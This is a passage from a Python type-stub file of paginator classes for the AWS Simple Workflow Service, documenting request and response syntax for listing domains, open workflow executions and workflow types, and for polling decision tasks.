* ``DEPRECATED`` – The domain was deprecated using DeprecateDomain , but is still in use. You should not create new workflow executions in this domain.
- **description** *(string) --*
The description of the domain provided through RegisterDomain .
- **NextToken** *(string) --*
A token to resume pagination.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the domains to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default, the results are returned in ascending alphabetical order by ``name`` of the domains.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListOpenWorkflowExecutions(Paginator):
def paginate(self, domain: str, startTimeFilter: Dict, typeFilter: Dict = None, tagFilter: Dict = None, reverseOrder: bool = None, executionFilter: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_open_workflow_executions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListOpenWorkflowExecutions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
startTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
typeFilter={
'name': 'string',
'version': 'string'
},
tagFilter={
'tag': 'string'
},
reverseOrder=True|False,
executionFilter={
'workflowId': 'string'
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'executionInfos': [
{
'execution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'startTimestamp': datetime(2015, 1, 1),
'closeTimestamp': datetime(2015, 1, 1),
'executionStatus': 'OPEN'|'CLOSED',
'closeStatus': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT',
'parent': {
'workflowId': 'string',
'runId': 'string'
},
'tagList': [
'string',
],
'cancelRequested': True|False
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information about workflow executions.
- **executionInfos** *(list) --*
The list of workflow information structures.
- *(dict) --*
Contains information about a workflow execution.
- **execution** *(dict) --*
The workflow execution this information is about.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **startTimestamp** *(datetime) --*
The time when the execution was started.
- **closeTimestamp** *(datetime) --*
The time when the workflow execution was closed. Set only if the execution status is CLOSED.
- **executionStatus** *(string) --*
The current status of the execution.
- **closeStatus** *(string) --*
If the execution status is closed then this specifies how the execution was closed:
* ``COMPLETED`` – the execution was successfully completed.
* ``CANCELED`` – the execution was canceled.Cancellation allows the implementation to gracefully clean up before the execution is closed.
* ``TERMINATED`` – the execution was force terminated.
* ``FAILED`` – the execution failed to complete.
* ``TIMED_OUT`` – the execution did not complete in the alloted time and was automatically timed out.
* ``CONTINUED_AS_NEW`` – the execution is logically continued. This means the current execution was completed and a new execution was started to carry on the workflow.
- **parent** *(dict) --*
If this workflow execution is a child of another execution then contains the workflow execution that started this execution.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **tagList** *(list) --*
The list of tags associated with the workflow execution. Tags can be used to identify and list workflow executions of interest through the visibility APIs. A workflow execution can have a maximum of 5 tags.
- *(string) --*
- **cancelRequested** *(boolean) --*
Set to true if a cancellation is requested for this workflow execution.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain that contains the workflow executions to list.
:type startTimeFilter: dict
:param startTimeFilter: **[REQUIRED]**
Workflow executions are included in the returned results based on whether their start times are within the range specified by this filter.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type typeFilter: dict
:param typeFilter:
If specified, only executions of the type specified in the filter are returned.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **name** *(string) --* **[REQUIRED]**
Name of the workflow type.
- **version** *(string) --*
Version of the workflow type.
:type tagFilter: dict
:param tagFilter:
If specified, only executions that have the matching tag are listed.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **tag** *(string) --* **[REQUIRED]**
Specifies the tag that must be associated with the execution for it to meet the filter criteria.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in descending order of the start time of the executions.
:type executionFilter: dict
:param executionFilter:
If specified, only workflow executions matching the workflow ID specified in the filter are returned.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **workflowId** *(string) --* **[REQUIRED]**
The workflowId to pass of match the criteria of this filter.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListWorkflowTypes(Paginator):
def paginate(self, domain: str, registrationStatus: str, name: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_workflow_types`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListWorkflowTypes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
name='string',
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'typeInfos': [
{
'workflowType': {
'name': 'string',
'version': 'string'
},
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string',
'creationDate': datetime(2015, 1, 1),
'deprecationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information structures about workflow types.
- **typeInfos** *(list) --*
The list of workflow type information.
- *(dict) --*
Contains information about a workflow type.
- **workflowType** *(dict) --*
The workflow type this information is about.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **status** *(string) --*
The current status of the workflow type.
- **description** *(string) --*
The description of the type registered through RegisterWorkflowType .
- **creationDate** *(datetime) --*
The date when this type was registered.
- **deprecationDate** *(datetime) --*
If the type is in deprecated state, then it is set to the date when the type was deprecated.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain in which the workflow types have been registered.
:type name: string
:param name:
If specified, lists the workflow type with this name.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the workflow types to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in ascending alphabetical order of the ``name`` of the workflow types.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class PollForDecisionTask(Paginator):
def paginate(self, domain: str, taskList: Dict, identity: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.poll_for_decision_task`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/PollForDecisionTask>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
taskList={
'name': 'string'
},
identity='string',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'taskToken': 'string',
'startedEventId': 123,
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'events': [
{
'eventTimestamp': datetime(2015, 1, 1),
'eventType': 'WorkflowExecutionStarted'|'WorkflowExecutionCancelRequested'|'WorkflowExecutionCompleted'|'CompleteWorkflowExecutionFailed'|'WorkflowExecutionFailed'|'FailWorkflowExecutionFailed'|'WorkflowExecutionTimedOut'|'WorkflowExecutionCanceled'|'CancelWorkflowExecutionFailed'|'WorkflowExecutionContinuedAsNew'|'ContinueAsNewWorkflowExecutionFailed'|'WorkflowExecutionTerminated'|'DecisionTaskScheduled'|'DecisionTaskStarted'|'DecisionTaskCompleted'|'DecisionTaskTimedOut'|'ActivityTaskScheduled'|'ScheduleActivityTaskFailed'|'ActivityTaskStarted'|'ActivityTaskCompleted'|'ActivityTaskFailed'|'ActivityTaskTimedOut'|'ActivityTaskCanceled'|'ActivityTaskCancelRequested'|'RequestCancelActivityTaskFailed'|'WorkflowExecutionSignaled'|'MarkerRecorded'|'RecordMarkerFailed'|'TimerStarted'|'StartTimerFailed'|'TimerFired'|'TimerCanceled'|'CancelTimerFailed'|'StartChildWorkflowExecutionInitiated'|'StartChildWorkflowExecutionFailed'|'ChildWorkflowExecutionStarted'|'ChildWorkflowExecutionCompleted'|'ChildWorkflowExecutionFailed'|'ChildWorkflowExecutionTimedOut'|'ChildWorkflowExecutionCanceled'|'ChildWorkflowExecutionTerminated'|'SignalExternalWorkflowExecutionInitiated'|'SignalExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionSignaled'|'RequestCancelExternalWorkflowExecutionInitiated'|'RequestCancelExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionCancelRequested'|'LambdaFunctionScheduled'|'LambdaFunctionStarted'|'LambdaFunctionCompleted'|'LambdaFunctionFailed'|'LambdaFunctionTimedOut'|'ScheduleLambdaFunctionFailed'|'StartLambdaFunctionFailed',
'eventId': 123,
'workflowExecutionStartedEventAttributes': {
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'tagList': [
'string',
],
'continuedExecutionRunId': 'string',
'parentWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'parentInitiatedEventId': 123,
'lambdaRole': 'string'
},
'workflowExecutionCompletedEventAttributes': {
'result': 'string',
'decisionTaskCompletedEventId': 123
},
'completeWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'failWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON'
},
'workflowExecutionCanceledEventAttributes': {
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'cancelWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionContinuedAsNewEventAttributes': {
'input': 'string',
'decisionTaskCompletedEventId': 123,
'newExecutionRunId': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'tagList': [
'string',
],
'workflowType': {
'name': 'string',
'version': 'string'
},
'lambdaRole': 'string'
},
'continueAsNewWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'WORKFLOW_TYPE_DEPRECATED'|'WORKFLOW_TYPE_DOES_NOT_EXIST'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'CONTINUE_AS_NEW_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTerminatedEventAttributes': {
'reason': 'string',
'details': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'cause': 'CHILD_POLICY_APPLIED'|'EVENT_LIMIT_EXCEEDED'|'OPERATOR_INITIATED'
},
'workflowExecutionCancelRequestedEventAttributes': {
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123,
'cause': 'CHILD_POLICY_APPLIED'
},
'decisionTaskScheduledEventAttributes': {
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'startToCloseTimeout': 'string'
},
'decisionTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'decisionTaskCompletedEventAttributes': {
'executionContext': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'decisionTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskScheduledEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'input': 'string',
'control': 'string',
'scheduleToStartTimeout': 'string',
'scheduleToCloseTimeout': 'string',
'startToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'heartbeatTimeout': 'string'
},
'activityTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'activityTaskCompletedEventAttributes': {
'result': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123
},
'activityTaskTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE'|'SCHEDULE_TO_START'|'SCHEDULE_TO_CLOSE'|'HEARTBEAT',
'scheduledEventId': 123,
'startedEventId': 123,
'details': 'string'
},
'activityTaskCanceledEventAttributes': {
'details': 'string',
'scheduledEventId': 123,
'startedEventId': 123,
'latestCancelRequestedEventId': 123
},
'activityTaskCancelRequestedEventAttributes': {
'decisionTaskCompletedEventId': 123,
'activityId': 'string'
},
'workflowExecutionSignaledEventAttributes': {
'signalName': 'string',
'input': 'string',
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123
},
'markerRecordedEventAttributes': {
'markerName': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'recordMarkerFailedEventAttributes': {
'markerName': 'string',
'cause': 'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'timerStartedEventAttributes': {
'timerId': 'string',
'control': 'string',
'startToFireTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'timerFiredEventAttributes': {
'timerId': 'string',
'startedEventId': 123
},
'timerCanceledEventAttributes': {
'timerId': 'string',
'startedEventId': 123,
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'control': 'string',
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'decisionTaskCompletedEventId': 123,
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskStartToCloseTimeout': 'string',
'tagList': [
'string',
],
'lambdaRole': 'string'
},
'childWorkflowExecutionStartedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123
},
'childWorkflowExecutionCompletedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'result': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionFailedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'reason': 'string',
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTimedOutEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'timeoutType': 'START_TO_CLOSE',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionCanceledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'details': 'string',
'initiatedEventId': 123,
'startedEventId': 123
},
'childWorkflowExecutionTerminatedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'initiatedEventId': 123,
'startedEventId': 123
},
'signalExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'signalName': 'string',
'input': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionSignaledEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'signalExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'SIGNAL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'externalWorkflowExecutionCancelRequestedEventAttributes': {
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'initiatedEventId': 123
},
'requestCancelExternalWorkflowExecutionInitiatedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'requestCancelExternalWorkflowExecutionFailedEventAttributes': {
'workflowId': 'string',
'runId': 'string',
'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'REQUEST_CANCEL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'scheduleActivityTaskFailedEventAttributes': {
'activityType': {
'name': 'string',
'version': 'string'
},
'activityId': 'string',
'cause': 'ACTIVITY_TYPE_DEPRECATED'|'ACTIVITY_TYPE_DOES_NOT_EXIST'|'ACTIVITY_ID_ALREADY_IN_USE'|'OPEN_ACTIVITIES_LIMIT_EXCEEDED'|'ACTIVITY_CREATION_RATE_EXCEEDED'|'DEFAULT_SCHEDULE_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_SCHEDULE_TO_START_TIMEOUT_UNDEFINED'|'DEFAULT_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_HEARTBEAT_TIMEOUT_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'requestCancelActivityTaskFailedEventAttributes': {
'activityId': 'string',
'cause': 'ACTIVITY_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_ALREADY_IN_USE'|'OPEN_TIMERS_LIMIT_EXCEEDED'|'TIMER_CREATION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'cancelTimerFailedEventAttributes': {
'timerId': 'string',
'cause': 'TIMER_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'startChildWorkflowExecutionFailedEventAttributes': {
'workflowType': {
'name': 'string',
'version': 'string'
},
'cause': 'WORKFLOW_TYPE_DOES_NOT_EXIST'|'WORKFLOW_TYPE_DEPRECATED'|'OPEN_CHILDREN_LIMIT_EXCEEDED'|'OPEN_WORKFLOWS_LIMIT_EXCEEDED'|'CHILD_CREATION_RATE_EXCEEDED'|'WORKFLOW_ALREADY_RUNNING'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'OPERATION_NOT_PERMITTED',
'workflowId': 'string',
'initiatedEventId': 123,
'decisionTaskCompletedEventId': 123,
'control': 'string'
},
'lambdaFunctionScheduledEventAttributes': {
'id': 'string',
'name': 'string',
'control': 'string',
'input': 'string',
'startToCloseTimeout': 'string',
'decisionTaskCompletedEventId': 123
},
'lambdaFunctionStartedEventAttributes': {
'scheduledEventId': 123
},
'lambdaFunctionCompletedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'result': 'string'
},
'lambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'reason': 'string',
'details': 'string'
},
'lambdaFunctionTimedOutEventAttributes': {
'scheduledEventId': 123,
'startedEventId': 123,
'timeoutType': 'START_TO_CLOSE'
},
'scheduleLambdaFunctionFailedEventAttributes': {
'id': 'string',
'name': 'string',
'cause': 'ID_ALREADY_IN_USE'|'OPEN_LAMBDA_FUNCTIONS_LIMIT_EXCEEDED'|'LAMBDA_FUNCTION_CREATION_RATE_EXCEEDED'|'LAMBDA_SERVICE_NOT_AVAILABLE_IN_REGION',
'decisionTaskCompletedEventId': 123
},
'startLambdaFunctionFailedEventAttributes': {
'scheduledEventId': 123,
'cause': 'ASSUME_ROLE_FAILED',
'message': 'string'
}
},
],
'previousStartedEventId': 123,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
A structure that represents a decision task. Decision tasks are sent to deciders in order for them to make decisions.
- **taskToken** *(string) --*
The opaque string used as a handle on the task. This token is used by workers to communicate progress and response information back to the system about the task.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded in the history.
- **workflowExecution** *(dict) --*
The workflow execution for which this decision task was created.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution for which this decision task was created.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **events** *(list) --*
A paginated list of history events of the workflow execution. The decider uses this during the processing of the decision task.
- *(dict) --*
Event within a workflow execution. A history event can be one of these types:
* ``ActivityTaskCancelRequested`` – A ``RequestCancelActivityTask`` decision was received by the system.
* ``ActivityTaskCanceled`` – The activity task was successfully canceled.
* ``ActivityTaskCompleted`` – An activity worker successfully completed an activity task by calling RespondActivityTaskCompleted .
* ``ActivityTaskFailed`` – An activity worker failed an activity task by calling RespondActivityTaskFailed .
* ``ActivityTaskScheduled`` – An activity task was scheduled for execution.
* ``ActivityTaskStarted`` – The scheduled activity task was dispatched to a worker.
* ``ActivityTaskTimedOut`` – The activity task timed out.
* ``CancelTimerFailed`` – Failed to process CancelTimer decision. This happens when the decision isn't configured properly, for example no timer exists with the specified timer Id.
* ``CancelWorkflowExecutionFailed`` – A request to cancel a workflow execution failed.
* ``ChildWorkflowExecutionCanceled`` – A child workflow execution, started by this workflow execution, was canceled and closed.
* ``ChildWorkflowExecutionCompleted`` – A child workflow execution, started by this workflow execution, completed successfully and was closed.
* ``ChildWorkflowExecutionFailed`` – A child workflow execution, started by this workflow execution, failed to complete successfully and was closed.
* ``ChildWorkflowExecutionStarted`` – A child workflow execution was successfully started.
* ``ChildWorkflowExecutionTerminated`` – A child workflow execution, started by this workflow execution, was terminated.
* ``ChildWorkflowExecutionTimedOut`` – A child workflow execution, started by this workflow execution, timed out and was closed.
* ``CompleteWorkflowExecutionFailed`` – The workflow execution failed to complete.
* ``ContinueAsNewWorkflowExecutionFailed`` – The workflow execution failed to complete after being continued as a new workflow execution.
* ``DecisionTaskCompleted`` – The decider successfully completed a decision task by calling RespondDecisionTaskCompleted .
* ``DecisionTaskScheduled`` – A decision task was scheduled for the workflow execution.
* ``DecisionTaskStarted`` – The decision task was dispatched to a decider.
* ``DecisionTaskTimedOut`` – The decision task timed out.
* ``ExternalWorkflowExecutionCancelRequested`` – Request to cancel an external workflow execution was successfully delivered to the target execution.
* ``ExternalWorkflowExecutionSignaled`` – A signal, requested by this workflow execution, was successfully delivered to the target external workflow execution.
* ``FailWorkflowExecutionFailed`` – A request to mark a workflow execution as failed, itself failed.
* ``MarkerRecorded`` – A marker was recorded in the workflow history as the result of a ``RecordMarker`` decision.
* ``RecordMarkerFailed`` – A ``RecordMarker`` decision was returned as failed.
* ``RequestCancelActivityTaskFailed`` – Failed to process RequestCancelActivityTask decision. This happens when the decision isn't configured properly.
* ``RequestCancelExternalWorkflowExecutionFailed`` – Request to cancel an external workflow execution failed.
* ``RequestCancelExternalWorkflowExecutionInitiated`` – A request was made to request the cancellation of an external workflow execution.
* ``ScheduleActivityTaskFailed`` – Failed to process ScheduleActivityTask decision. This happens when the decision isn't configured properly, for example the activity type specified isn't registered.
* ``SignalExternalWorkflowExecutionFailed`` – The request to signal an external workflow execution failed.
* ``SignalExternalWorkflowExecutionInitiated`` – A request to signal an external workflow was made.
* ``StartActivityTaskFailed`` – A scheduled activity task failed to start.
* ``StartChildWorkflowExecutionFailed`` – Failed to process StartChildWorkflowExecution decision. This happens when the decision isn't configured properly, for example the workflow type specified isn't registered.
* ``StartChildWorkflowExecutionInitiated`` – A request was made to start a child workflow execution.
* ``StartTimerFailed`` – Failed to process StartTimer decision. This happens when the decision isn't configured properly, for example a timer already exists with the specified timer Id.
* ``TimerCanceled`` – A timer, previously started for this workflow execution, was successfully canceled.
* ``TimerFired`` – A timer, previously started for this workflow execution, fired.
* ``TimerStarted`` – A timer was started for the workflow execution due to a ``StartTimer`` decision.
* ``WorkflowExecutionCancelRequested`` – A request to cancel this workflow execution was made.
* ``WorkflowExecutionCanceled`` – The workflow execution was successfully canceled and closed.
* ``WorkflowExecutionCompleted`` – The workflow execution was closed due to successful completion.
* ``WorkflowExecutionContinuedAsNew`` – The workflow execution was closed and a new execution of the same type was created with the same workflowId.
* ``WorkflowExecutionFailed`` – The workflow execution closed due to a failure.
* ``WorkflowExecutionSignaled`` – An external signal was received for the workflow execution.
* ``WorkflowExecutionStarted`` – The workflow execution was started.
* ``WorkflowExecutionTerminated`` – The workflow execution was terminated.
* ``WorkflowExecutionTimedOut`` – The workflow execution was closed because a time out was exceeded.
- **eventTimestamp** *(datetime) --*
The date and time when the event occurred.
- **eventType** *(string) --*
The type of the history event.
- **eventId** *(integer) --*
The system generated ID of the event. This ID uniquely identifies the event with in the workflow execution history.
- **workflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for this workflow type.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this workflow execution is terminated, by calling the TerminateWorkflowExecution action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskList** *(dict) --*
The name of the task list for scheduling the decision tasks for this workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the decision tasks in the workflow execution.
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique with in a domain.
- **tagList** *(list) --*
The list of tags associated with this workflow execution. An execution can have up to 5 tags.
- *(string) --*
- **continuedExecutionRunId** *(string) --*
If this workflow execution was started due to a ``ContinueAsNewWorkflowExecution`` decision, then it contains the ``runId`` of the previous workflow execution that was closed and continued as this execution.
- **parentWorkflowExecution** *(dict) --*
